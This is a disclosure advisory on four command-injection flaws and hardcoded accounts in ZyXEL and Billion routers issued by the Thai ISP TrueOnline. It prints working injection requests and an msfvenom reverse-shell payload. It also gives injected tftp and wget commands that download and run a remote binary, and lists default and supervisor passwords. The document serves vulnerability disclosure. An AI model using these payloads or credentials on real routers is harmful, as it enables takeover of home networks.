SSD Advisory – ZyXEL / Billion Multiple Vulnerabilities

Vulnerability Summary
The following advisory describes four (4) vulnerabilities and default accounts / passwords in ZyXEL / Billion customized routers.
TrueOnline is a major Internet Service Provider in Thailand that provides customized versions of routers to its customers, free of charge.
The routers are manufactured by ZyXEL and Billion runs a special Linux distribution called “tclinux”. Several models are distributed by TrueOnline, three in particular are widespread:

  1. ZyXEL P660HN-T v1 (distributed up to 2013)
  2. ZyXEL P660HN-T v2
  3. Billion 5200W-T (currently being distributed to new clients)

These are customized versions of existing ZyXEL and Billion routers. They are MIPS systems and they all run BOA web server. The routers are vulnerable via command injections in its web interface, which can be exploited by an unauthenticated as well as an authenticated attacker. Furthermore, the routers includes several hardcoded accounts besides the usual administrator account.
The four vulnerabilities found in ZyXEL / Billion routers:

  1. Unauthenticated remote command execution vulnerability – P660HN-T v1 router
  2. Unauthenticated remote command execution vulnerability – Billion 5200W-T
  3. Authenticated remote command execution vulnerability – Billion 5200W-T
  4. Unauthenticated remote command execution vulnerability – P660HN-T v2

Default accounts and passwords:

  1. Default accounts- P660HN-T v1 router
  2. Default accounts – P660HN-T v2
  3. Default accounts – Billion 5200W-T router

Credit
Pedro Ribeiro (pedrib@gmail.com) has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Unauthenticated remote command execution vulnerability – P660HN-T v1 router
The P660HN-T v1 router has a command injection vulnerability in Maintenance > Logs > System Log > Remote System Log
Remote host: ;command;#
The vulnerability is can be found in the ViewLog.asp page, which is accessible unauthenticated.

POST /cgi-bin/ViewLog.asp HTTP/1.1
remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save

The command injection is in remote_host parameter:

remote_host=%3bping+-c+3+10.0.99.102%3b%23

Proof of Concept
To preform the attack, the following MSF command line should be used:

msfvenom -p linux/mipsbe/shell_reverse_tcp -f elf -o /tmp/shell-be.bin lhost=192.168.1.35 lport=4444

Which will serve the /tmp directory through the tftp service.
This should be followed by downloading and executing a shell by injecting the following command:

cd tmp; tftp -g -r shell.bin 10.13.37.1; chmod +x /tmp/shell.bin; /tmp/shell.bin

Default accounts- P660HN-T v1 router

  1. username: admin; password: password
  2. username: true; password: true

Unauthenticated remote command execution vulnerability – Billion 5200W-T
There’s an unauthenticated command injection in the adv_remotelog.asp file:

POST /cgi-bin/adv_remotelog.asp HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514

The injection is in the syslogServerAddr parameter that can be exploited by entering a valid IP address, followed by “;<COMMAND>;”
Proof of Concept
Same as the previously mentioned unauthenticated remote command execution vulnerability – P660HN-T v1, the only difference is the target device.
Authenticated command execution vulnerability – Billion 5200W-T
The Billion 5200W-T has a authenticated command injections in its interface tools_time.asp with the uiViewSNTPServer parameter:

POST /cgi-bin/tools_time.asp HTTP/1.1
Host: 127.0.0.1:10080
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Cookie: SESSIONID=7c082c75
Content-Length: ...
SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0
&uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29
&uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute=
&uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer="%3b+ping+-c+20+127.0.0.1+%26%23
&ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA

This request will write the text, which is the command you want it to execute, to a file named /etc/ntp.sh:

/userfs/bin/ntpclient -s -c 3 -l -h ""; ping -c 20 127.0.0.1 &#" &

Which is then executed.
Default accounts – Billion 5200W-T router

  1. username: admin; password: password
  2. username: true; password: true
  3. username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678

Unauthenticated command execution vulnerability – P660HN-T v2
The remote command vulnerability is composed from an authenticated command injection and a hardcoded supervisor password. The command injection vulnerability is in the logSet.asp file and the hardcoded supervisor password is – username: supervisor; password: zyad1234.

POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1
Content-Length: ...
logSetting_H=1&active=1&logMode=LocalAndRemote&serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&serverPort=514

This will be written to /etc/syslog.conf file as:

ServerIP="192.168.1.1 `ping -c 3 1.1.1.1`&#"

Which will then be executed by the syslog background process.
The injection parameter is the ServerIP:

ServerIP=1.1.1.1`<command />`&#

The actual command that can be injected has a length limitation of 28 characters.
Proof of Concept
To preform the attack, the following MSF command line should be used:

msfvenom -p linux/mipsbe/shell_reverse_tcp -f elf -o /tmp/shell-be.bin lhost=192.168.1.35 lport=4444

Which will serve the /tmp directory through the tftp service.
Authenticate to interface with supervisor:zyad1234
Write the following file /tmp/a by doing several injections (the injection accepts only 10 and 13 characters at a time).

#!/bin/sh
wget -q -O /tmp/b http://10.13.37.1/b
chmod +x /tmp/b
/tmp/b

Then inject the following commands:

chmod +x /tmp/a
/tmp/a

Default accounts – P660HN-T v2 router

  1. username: admin; password: password
  2. username: true; password: true
  3. username: supervisor; password: zyad1234

Vendor Response
We notified ZyXEL of the vulnerabilities back in July 2016, repeated attempts to re-establish contact and get some answer on the status of the patches for these vulnerabilities went unanswered. At this time there is no solution or workaround for these vulnerabilities.
Editing: In January 2017, ZyXEL contact us and correct us that they are not the manufacturer of Billion routers.